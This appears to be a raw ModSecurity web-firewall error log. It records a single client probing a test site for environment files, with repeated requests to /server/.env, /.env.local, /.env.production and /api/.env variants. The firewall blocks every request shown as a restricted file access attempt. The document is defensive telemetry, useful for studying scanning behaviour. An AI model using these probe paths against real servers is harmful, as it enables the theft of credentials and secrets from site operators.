[Fri Jan 16 03:21:51.099945 2026] [:error] [pid 1444040] [client 45.148.10.246:60818] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env/"] [unique_id "aWmgv_n_5sIyKhJ5GAza-QAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/server/.env/
[Fri Jan 16 03:21:51.246595 2026] [:error] [pid 1444031] [client 45.148.10.246:60832] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgv3-9MmrgwjmYTAJT7QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//server/.env
[Fri Jan 16 03:21:51.246840 2026] [:error] [pid 1444031] [client 45.148.10.246:60832] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgv3-9MmrgwjmYTAJT7QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//server/.env
[Fri Jan 16 03:21:51.247011 2026] [:error] [pid 1444031] [client 45.148.10.246:60832] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgv3-9MmrgwjmYTAJT7QAAAAA"], referer: http://economiasolidale.test.indacotrentino.com//server/.env
[Fri Jan 16 03:21:51.446159 2026] [:error] [pid 1444035] [client 45.148.10.246:60844] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgv7auW6yeGWXfDeFYkwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env
[Fri Jan 16 03:21:51.446485 2026] [:error] [pid 1444035] [client 45.148.10.246:60844] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgv7auW6yeGWXfDeFYkwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env
[Fri Jan 16 03:21:51.446689 2026] [:error] [pid 1444035] [client 45.148.10.246:60844] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env"] [unique_id "aWmgv7auW6yeGWXfDeFYkwAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env
[Fri Jan 16 03:21:51.631368 2026] [:error] [pid 1444033] [client 45.148.10.246:60852] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgv9LJkp65ULFQ2YYjQQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.local
[Fri Jan 16 03:21:51.631598 2026] [:error] [pid 1444033] [client 45.148.10.246:60852] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgv9LJkp65ULFQ2YYjQQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.local
[Fri Jan 16 03:21:51.631763 2026] [:error] [pid 1444033] [client 45.148.10.246:60852] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgv9LJkp65ULFQ2YYjQQAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.local
[Fri Jan 16 03:21:51.972346 2026] [:error] [pid 1444034] [client 45.148.10.246:60860] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgv-RfEYyDES-ZFL4i0QAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//server/.env.local
[Fri Jan 16 03:21:51.972586 2026] [:error] [pid 1444034] [client 45.148.10.246:60860] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgv-RfEYyDES-ZFL4i0QAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//server/.env.local
[Fri Jan 16 03:21:51.972739 2026] [:error] [pid 1444034] [client 45.148.10.246:60860] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgv-RfEYyDES-ZFL4i0QAAAAM"], referer: http://economiasolidale.test.indacotrentino.com//server/.env.local
[Fri Jan 16 03:21:52.129758 2026] [:error] [pid 1444226] [client 45.148.10.246:60872] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgwGcpoCUgeFICb0bgOQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env.local
[Fri Jan 16 03:21:52.129991 2026] [:error] [pid 1444226] [client 45.148.10.246:60872] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgwGcpoCUgeFICb0bgOQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env.local
[Fri Jan 16 03:21:52.130151 2026] [:error] [pid 1444226] [client 45.148.10.246:60872] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.local"] [unique_id "aWmgwGcpoCUgeFICb0bgOQAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env.local
[Fri Jan 16 03:21:52.304627 2026] [:error] [pid 1444040] [client 45.148.10.246:60874] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwPn_5sIyKhJ5GAza-gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.production
[Fri Jan 16 03:21:52.304852 2026] [:error] [pid 1444040] [client 45.148.10.246:60874] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwPn_5sIyKhJ5GAza-gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.production
[Fri Jan 16 03:21:52.305002 2026] [:error] [pid 1444040] [client 45.148.10.246:60874] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwPn_5sIyKhJ5GAza-gAAAAU"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.production
[Fri Jan 16 03:21:52.463571 2026] [:error] [pid 1444031] [client 45.148.10.246:60886] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production/"] [unique_id "aWmgwH-9MmrgwjmYTAJT7gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.production/
[Fri Jan 16 03:21:52.463817 2026] [:error] [pid 1444031] [client 45.148.10.246:60886] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production/"] [unique_id "aWmgwH-9MmrgwjmYTAJT7gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.production/
[Fri Jan 16 03:21:52.463971 2026] [:error] [pid 1444031] [client 45.148.10.246:60886] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production/"] [unique_id "aWmgwH-9MmrgwjmYTAJT7gAAAAA"], referer: http://economiasolidale.test.indacotrentino.com/server/.env.production/
[Fri Jan 16 03:21:52.623444 2026] [:error] [pid 1444035] [client 45.148.10.246:60898] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwLauW6yeGWXfDeFYlAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//server/.env.production
[Fri Jan 16 03:21:52.623672 2026] [:error] [pid 1444035] [client 45.148.10.246:60898] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwLauW6yeGWXfDeFYlAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//server/.env.production
[Fri Jan 16 03:21:52.623839 2026] [:error] [pid 1444035] [client 45.148.10.246:60898] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwLauW6yeGWXfDeFYlAAAAAQ"], referer: http://economiasolidale.test.indacotrentino.com//server/.env.production
[Fri Jan 16 03:21:52.777577 2026] [:error] [pid 1444033] [client 45.148.10.246:60912] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwNLJkp65ULFQ2YYjQgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env.production
[Fri Jan 16 03:21:52.777848 2026] [:error] [pid 1444033] [client 45.148.10.246:60912] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwNLJkp65ULFQ2YYjQgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env.production
[Fri Jan 16 03:21:52.778025 2026] [:error] [pid 1444033] [client 45.148.10.246:60912] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/server/.env.production"] [unique_id "aWmgwNLJkp65ULFQ2YYjQgAAAAI"], referer: http://economiasolidale.test.indacotrentino.com/./server/.env.production
[Fri Jan 16 03:21:52.941235 2026] [:error] [pid 1444034] [client 45.148.10.246:60916] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwORfEYyDES-ZFL4i0gAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/api/.env
[Fri Jan 16 03:21:52.941492 2026] [:error] [pid 1444034] [client 45.148.10.246:60916] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwORfEYyDES-ZFL4i0gAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/api/.env
[Fri Jan 16 03:21:52.941671 2026] [:error] [pid 1444034] [client 45.148.10.246:60916] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwORfEYyDES-ZFL4i0gAAAAM"], referer: http://economiasolidale.test.indacotrentino.com/api/.env
[Fri Jan 16 03:21:53.146063 2026] [:error] [pid 1444226] [client 45.148.10.246:60924] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env/"] [unique_id "aWmgwWcpoCUgeFICb0bgOgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/api/.env/
[Fri Jan 16 03:21:53.146289 2026] [:error] [pid 1444226] [client 45.148.10.246:60924] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env/"] [unique_id "aWmgwWcpoCUgeFICb0bgOgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/api/.env/
[Fri Jan 16 03:21:53.146474 2026] [:error] [pid 1444226] [client 45.148.10.246:60924] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env/"] [unique_id "aWmgwWcpoCUgeFICb0bgOgAAAAY"], referer: http://economiasolidale.test.indacotrentino.com/api/.env/
[Fri Jan 16 03:21:53.303421 2026] [:error] [pid 1444040] [client 45.148.10.246:60936] [client 45.148.10.246] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwfn_5sIyKhJ5GAza-wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//api/.env
[Fri Jan 16 03:21:53.303657 2026] [:error] [pid 1444040] [client 45.148.10.246:60936] [client 45.148.10.246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwfn_5sIyKhJ5GAza-wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//api/.env
[Fri Jan 16 03:21:53.303819 2026] [:error] [pid 1444040] [client 45.148.10.246:60936] [client 45.148.10.246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aWmgwfn_5sIyKhJ5GAza-wAAAAU"], referer: http://economiasolidale.test.indacotrentino.com//api/.env
